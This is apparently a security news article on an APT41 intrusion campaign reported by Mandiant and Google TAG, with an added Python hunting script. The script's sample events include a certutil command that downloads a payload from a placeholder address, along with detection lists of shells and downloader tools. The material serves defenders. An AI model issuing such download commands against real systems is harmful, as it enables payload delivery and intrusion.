Threat intelligence firm Mandiant in collaboration with Google’s Threat Analysis Group (TAG) observed a sustained campaign by the advanced persistent threat (APT) group APT41 targeting and compromising multiple organizations operating within the global shipping and logistics, media and entertainment, technology, and automotive sectors. Most organizations were operating in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. These hackers have infiltrated and maintained prolonged, unauthorized access to numerous victims’ networks since 2023, enabling them to extract sensitive data over an extended period.
Mandiant also observed reconnaissance against similar organizations in other countries (noted below). At the time of publication, neither Mandiant nor Google TAG had indicators that those organizations had been compromised by APT41, although the activity could indicate an expanded scope of targeting.
“Mandiant became aware of an APT41 intrusion where the malicious actor deployed a combination of ANTSWORD and BLUEBEAM web shells for persistence,” Mike Stokkel, Pierre Gerlings, Renato Fontana, Luis Rocha, Jared Wilson, Stephen Eckels, Jonathan Lepore, Mandiant researchers wrote in a blog post. “These web shells were identified on a Tomcat Apache Manager server and active since at least 2023. APT41 utilized these web shells to execute certutil.exe to download the DUSTPAN dropper to stealthily load BEACON. As the APT41 intrusion progressed, the group escalated its tactics by deploying the DUSTTRAP dropper.”
They added that upon execution, DUSTTRAP would decrypt a malicious payload and execute it in memory, leaving minimal forensic traces. “The decrypted payload was designed to establish communication channels with either APT41-controlled infrastructure for command and control or, in some instances, with a compromised Google Workspace account, further blending its malicious activities with legitimate traffic. The affected Google Workspace accounts have been successfully remediated to prevent further unauthorized access.”
Furthermore, APT41 leveraged SQLULDR2 to export data from Oracle databases and used PINEGROVE to systematically transfer large volumes of sensitive data from the compromised networks to OneDrive, enabling exfiltration and subsequent analysis.
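The intrusion chain described above (web shell on a Tomcat server, certutil.exe used as a downloader, SQLULDR2 run against Oracle) leaves process-creation artifacts that a defender can hunt for. The following is an added example written for this article, not code from Mandiant or Google TAG: it runs three simple detection heuristics over a handful of constructed process-creation events shaped like Sysmon Event ID 1 records. The image names, the 198.51.100.23 address (documentation range) and the file paths are all assumptions made for the sample data.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (parent image, image, command line).
# They are not from any real intrusion; they only exercise the rules below.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Tomcat service worker spawning a shell: what web shell command execution looks like
        "parent_image": r"C:\Program Files\Apache Software Foundation\Tomcat 9.0\bin\tomcat9.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"cmd.exe /c certutil.exe -urlcache -split -f http://198.51.100.23/update.dat C:\Windows\Temp\update.dat",
    },
    {   # certutil.exe abused as a downloader (LOLBin), child of the shell above
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil.exe -urlcache -split -f http://198.51.100.23/update.dat C:\Windows\Temp\update.dat",
    },
    {   # Benign certutil.exe use: inspecting a certificate store, no URL fetch
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil.exe -store my",
    },
    {   # Oracle bulk export tool run from a temp directory
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\Temp\sqluldr2.exe",
        "command_line": r'sqluldr2.exe user=app/pw@ORCL query="select * from customers" file=C:\Windows\Temp\out.csv',
    },
    {   # Ordinary service start of Tomcat itself: no child shell, should not fire
        "parent_image": r"C:\Windows\System32\services.exe",
        "image": r"C:\Program Files\Apache Software Foundation\Tomcat 9.0\bin\tomcat9.exe",
        "command_line": r'"C:\Program Files\Apache Software Foundation\Tomcat 9.0\bin\tomcat9.exe" //RS//Tomcat9',
    },
]

# Web server / application server processes that should rarely spawn an interactive shell.
WEB_SERVER_IMAGES = {"tomcat9.exe", "tomcat8.exe", "tomcat.exe", "java.exe", "javaw.exe",
                     "w3wp.exe", "httpd.exe", "nginx.exe"}
# Shells and LOLBins commonly launched through a web shell.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
                "wscript.exe", "cscript.exe"}
# certutil download pattern: -urlcache followed somewhere by an http(s) URL.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule the event matches."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"]
    hits: List[str] = []
    if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
        hits.append("webserver_spawned_shell")       # web shell command execution
    if image == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
        hits.append("certutil_download")             # certutil used to fetch a payload
    if image == "sqluldr2.exe":
        hits.append("oracle_bulk_export_tool")       # SQLULDR2 staging database contents
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and rule names for every event that matched at least one rule."""
    results = []
    for idx, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((idx, hits))
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)} :: {SAMPLE_EVENTS[idx]['command_line']}")
```

The rules are deliberately narrow hunting heuristics rather than a finished detection: a Java application server that legitimately shells out will trip the first rule and needs an allow-list, and the second rule only catches the -urlcache form of certutil downloading, so pair it with network telemetry for certutil.exe making outbound HTTP connections. Exfiltration to OneDrive via PINEGROVE is not modelled here because the article gives no detail about how that traffic looks on the wire.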
In May 2022, Mandiant reported that the persistent efforts of APT41, a prolific Chinese state-sponsored espionage group, had allowed it to compromise at least six U.S. state government networks by exploiting vulnerable Internet-facing web applications. The group exploited a zero-day vulnerability in the USAHerds animal health application as well as the Log4j vulnerability known as Log4Shell (CVE-2021-44228). Mandiant did not name the state governments that were affected.
APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity that may be outside of state control. The group’s financially motivated intrusions have primarily targeted the video game industry, involving activities such as stealing source code and digital certificates, manipulating virtual currencies, and attempting to deploy ransomware. APT41 is unique among tracked China-based actors in that it utilizes non-public malware typically reserved for espionage operations in activities that appear to fall outside the scope of state-sponsored missions.
The group’s espionage operations have targeted sectors such as healthcare, high-tech, and telecommunications, and other areas of economic interest. APT41 has frequently used software supply chain compromises, where they inject malicious code into legitimate software updates. They also employ advanced techniques like the use of bootkits and compromised digital certificates. The group’s consistent targeting of the video game industry for personal gain is believed to have contributed to the development of tactics later used in their espionage operations.
Mandiant's analysis of the victim organizations by sector revealed a notable geographic distribution. Nearly all targeted organizations in the shipping and logistics sector were located in Europe and the Middle East, with a single exception. In contrast, all affected organizations in the media and entertainment sector were located in Asia.
A significant portion of the victimized organizations within the shipping and logistics sector maintained operations across multiple continents, often as subsidiaries or affiliates of larger multinational corporations operating within the same industry.
Mandiant has detected reconnaissance activity directed towards similar organizations in other countries such as Singapore.
Earlier this week, Check Point researchers revealed that MuddyWater, an Iranian threat group linked to the Ministry of Intelligence and Security (MOIS) and active since at least 2017, has notably intensified its operations in Israel following the onset of the Israel-Hamas conflict last October. These campaigns have introduced a new, previously undocumented backdoor named BugSleep, specifically designed to target organizations in Israel.